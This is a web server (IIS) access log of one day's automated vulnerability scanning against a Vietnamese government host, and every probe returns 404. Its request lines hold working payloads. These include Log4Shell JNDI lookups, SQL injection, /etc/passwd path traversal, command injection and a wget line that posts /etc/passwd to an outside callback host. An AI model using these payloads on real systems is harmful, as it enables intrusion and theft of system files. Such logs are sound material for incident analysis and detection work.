2023-06-24 07:11:56 103.153.214.94 GET / x=${jndi:ldap://${:-278}${:-297}.${hostName}.uri.cia1s2qofm2jmb2f4jhgfgagmbfgwh15h.oast.fun/a} 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 30
2023-06-24 07:13:46 103.153.214.94 GET /author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&amp;p_id=1 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 34
2023-06-24 07:13:48 103.153.214.94 GET /cms/author_posts.php author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&amp;p_id=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26
2023-06-24 07:22:30 103.153.214.94 POST /wp-admin/admin-ajax.php action=joomsport_md_load 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 28
2023-06-24 07:23:16 103.153.214.94 POST /password_change.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 25
2023-06-24 07:24:00 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27
2023-06-24 07:24:01 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&amp;cmd=cgi_ntp_time&amp;f_ntp_server=`curl 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 23
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 07:41:23
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 07:41:22 103.153.214.94 GET /login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 26
2023-06-24 07:41:22 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 25
2023-06-24 07:41:23 103.153.214.94 GET /talari/app/files/2RYYjuJ1TMDn2FypmDTGjjnQiZb - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 26
2023-06-24 07:49:38 103.153.214.94 GET /api/ping count=5&amp;host=;cat%20/etc/passwd;&amp;port=80&amp;source=1.1.1.1&amp;type=icmp 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 29
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 08:13:15
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 08:13:15 103.153.214.94 GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php extension=menu&amp;parent=&quot;%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa&amp;view=menu 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 31
2023-06-24 08:15:28 103.153.214.94 GET /index.php page=/etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 31
2023-06-24 08:18:38 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 29
2023-06-24 08:24:53 103.153.214.94 POST /login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 bcvt.kontum.gov.vn:8172/module/login/login.html 404 7 0 24
2023-06-24 08:28:24 103.153.214.94 GET /plugin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 33
2023-06-24 08:30:03 103.153.214.94 GET /index.php ids[0,updatexml(0,concat(0xa,user()),0)]=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 132
2023-06-24 08:32:36 103.153.214.94 POST /scripts/setup.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 27
2023-06-24 08:34:07 103.153.214.94 GET /2RYYjswXBaJlBkeDnA1Bxt1g77M - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 26
2023-06-24 08:34:58 103.153.214.94 GET /php/ping.php hostname=|dir 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-24 08:37:31 103.153.214.94 GET /services/pluginscript/..;/..;/..;/getFavicon host=cia1s2qofm2jmb2f4jhg31osppnh7txfa.oast.fun 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 5 0 27
2023-06-24 08:48:29 103.153.214.94 POST /admin/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-06-24 08:57:47 103.153.214.94 POST /v1/backend1 - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 25
2023-06-24 08:57:47 103.153.214.94 GET /v1/2RYYjm4QQFE3xhj6vMYyMGvpHJR.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 25
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 09:20:52
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 09:20:52 103.153.214.94 GET /_admin/imgdownload.php filename=imgdownload.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 31
2023-06-24 09:31:41 103.153.214.94 POST /ccms/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 37
2023-06-24 09:31:41 103.153.214.94 GET /ccms/dashboard.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 24
2023-06-24 09:42:46 103.153.214.94 POST /_ignition/execute-solution - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-06-24 09:42:46 103.153.214.94 POST /_ignition/execute-solution - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
2023-06-24 09:42:46 103.153.214.94 POST /_ignition/execute-solution - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 22
2023-06-24 09:42:46 103.153.214.94 POST /_ignition/execute-solution - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 22
2023-06-24 09:42:46 103.153.214.94 POST /_ignition/execute-solution - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 25
2023-06-24 09:42:46 103.153.214.94 POST /_ignition/execute-solution - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 26
2023-06-24 09:45:07 103.153.214.94 GET /.tugboat - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 30
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 10:04:04
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 10:04:04 103.153.214.94 POST /wp-json/pie/v1/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 30
2023-06-24 10:10:30 103.153.214.94 POST /upload - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 30
2023-06-24 10:11:16 103.153.214.94 GET /tool/log/c.php host=nl+c.php&amp;strip_slashes=printf 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 26
2023-06-24 10:22:36 103.153.214.94 GET /pfblockerng/www/index.php - 8172 - 45.117.82.231 - - 404 7 0 25
2023-06-24 10:24:04 103.153.214.94 GET /dms/admin/accounts/payment_history.php account_id=2%27 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-24 10:26:48 103.153.214.94 GET /qvisdvr/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 28
2023-06-24 10:29:05 103.153.214.94 GET /metadata/v1.json - 8172 - 45.117.82.231 - - 404 7 0 32
2023-06-24 10:31:19 103.153.214.94 GET /elfinder/php/connector.minimal.php cmd=file&amp;download=1&amp;target=l1_&lt;@base64&gt;/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd&lt;@/base64&gt; 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 27
2023-06-24 10:32:16 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 29
2023-06-24 10:32:16 103.153.214.94 GET /wp-content/plugins/documentor-lite/core/js/documentor.js - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 25
2023-06-24 10:34:47 103.153.214.94 GET /_search a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-490%7D$%7B%3A-161%7D.$%7BhostName%7D.search.cia1s2qofm2jmb2f4jhgj58c5u6ikkznw.oast.fun%7D 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 29
2023-06-24 10:34:54 103.153.214.94 GET /wan.htm - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 23
2023-06-24 10:39:50 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&amp;sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&amp;type=json 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 27
2023-06-24 10:52:05 103.153.214.94 GET /reports/rwservlet/showenv - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 28
2023-06-24 10:52:05 103.153.214.94 GET /reports/rwservlet JOBTYPE=rwurl&amp;URLPARAMETER=file:///&amp;desformat=html&amp;destype=cache&amp;report=test.rdf 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 22
2023-06-24 10:52:12 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 24
2023-06-24 10:54:28 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 28
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 11:44:58
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 11:44:58 103.153.214.94 GET / password=PrOw!aN_fXp&amp;username=zyfwp 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-06-24 11:44:58 103.153.214.94 GET /ext-js/index.html - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 25
2023-06-24 11:57:17 103.153.214.94 POST /sysShell - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 25
2023-06-24 12:00:37 103.153.214.94 GET / function=call_user_func_array&amp;s=index/think\app/invokefunction&amp;vars[0]=phpinfo&amp;vars[1][]=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 27
2023-06-24 12:11:25 103.153.214.94 GET /wavemaker/studioService.download inUrl=file///etc/passwd&amp;method=getContent 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 41
2023-06-24 12:11:33 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 38
2023-06-24 12:17:17 103.153.214.94 GET /oam/server/opensso/sessionservice - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 43
2023-06-24 12:18:56 103.153.214.94 GET / code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20-&amp;rest_route=/pmpro/v1/order 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 45
2023-06-24 12:18:57 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/updates.js - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 46
2023-06-24 12:20:07 103.153.214.94 GET /catalog-portal/ui/oauth/verify deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d&amp;error 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 43
2023-06-24 12:21:21 103.153.214.94 POST /SamlResponseServlet - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 45
2023-06-24 12:27:09 103.153.214.94 GET /2RYYjROUHmfUnNqC9xdaIsVuokQ.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 38
2023-06-24 12:27:09 103.153.214.94 POST /directdata/direct/router - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 285
2023-06-24 12:30:39 103.153.214.94 POST /process/aprocess.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 45
2023-06-24 12:43:33 103.153.214.94 GET /plus/recommend.php _FILES[type][name]=1.jpg&amp;_FILES[type][size]=4294&amp;_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&amp;_FILES[type][type]=application/octet-stream&amp;action&amp;aid=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 89
2023-06-24 12:46:39 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 47
2023-06-24 12:49:36 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 48
2023-06-24 12:49:36 103.153.214.94 GET /wp-content/uploads/workreap-temp/2RYYjUIQH80Wn8SAgO8KpBze03S.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 42
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 13:37:59
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 13:37:59 103.153.214.94 GET /stat.jsp cmd=chcp+437+%7c+dir 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 39
2023-06-24 13:37:59 103.153.214.94 GET /api/subscriber - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 36
2023-06-24 13:37:59 103.153.214.94 POST /api/user/login - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 38
2023-06-24 13:38:09 103.153.214.94 POST /viewlog.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 43
2023-06-24 13:38:22 103.153.214.94 GET /index.php/Home/uploadify/fileList path=../../../&amp;type=.+ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 56
2023-06-24 13:39:08 103.153.214.94 GET /wp-content/plugins/nextgen-gallery/nggallery.php test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 288
2023-06-24 13:39:13 103.153.214.94 GET /download.do file=../../../../config.text 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 38
2023-06-24 13:39:20 103.153.214.94 GET /backend/backend/auth/signin - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 50
2023-06-24 13:39:21 103.153.214.94 POST /search/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 38
2023-06-24 13:39:45 103.153.214.94 POST / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 37
2023-06-24 13:40:46 103.153.214.94 GET /cgi-bin/operator/fileread READ.filePath=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 296
2023-06-24 13:41:43 103.153.214.94 GET /api/getServices name[]=$(wget%20--post-file%20/etc/passwd%20cibehhqofm2ke57n2m2gqmjwy9mar13rf.oast.live) 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 51
2023-06-24 13:42:35 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&amp;option=com_abbrev 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 41
2023-06-24 13:42:38 103.153.214.94 GET /index.php Itemid=1&amp;option=com_myblog&amp;task=../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 37
2023-06-24 13:42:41 103.153.214.94 GET /admin/ a=dopara&amp;app_type=shop&amp;c=product_admin&amp;id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23&amp;n=product 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 37
2023-06-24 13:42:47 103.153.214.94 GET /admin/index.php file=/../../../../../../../../../../../etc/passwd&amp;module=file_editor 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 39
2023-06-24 13:42:47 103.153.214.94 GET /wp-content/plugins/wordfence/lib/wordfenceClass.php file=/../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 39
2023-06-24 13:42:49 103.153.214.94 GET /index.php controller=../../../../../etc/passwd%00&amp;option=com_gcalendar 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 285
2023-06-24 13:42:51 103.153.214.94 GET /index.php option=com_projectfork&amp;section=../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 286
2023-06-24 13:42:56 103.153.214.94 GET /admin/ a=doSearchParameter&amp;appno=0+union+select+98989*443131,1--+&amp;c=language_general&amp;editor=cn&amp;n=language&amp;site=admin&amp;word=search 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 38
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 14:12:17
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
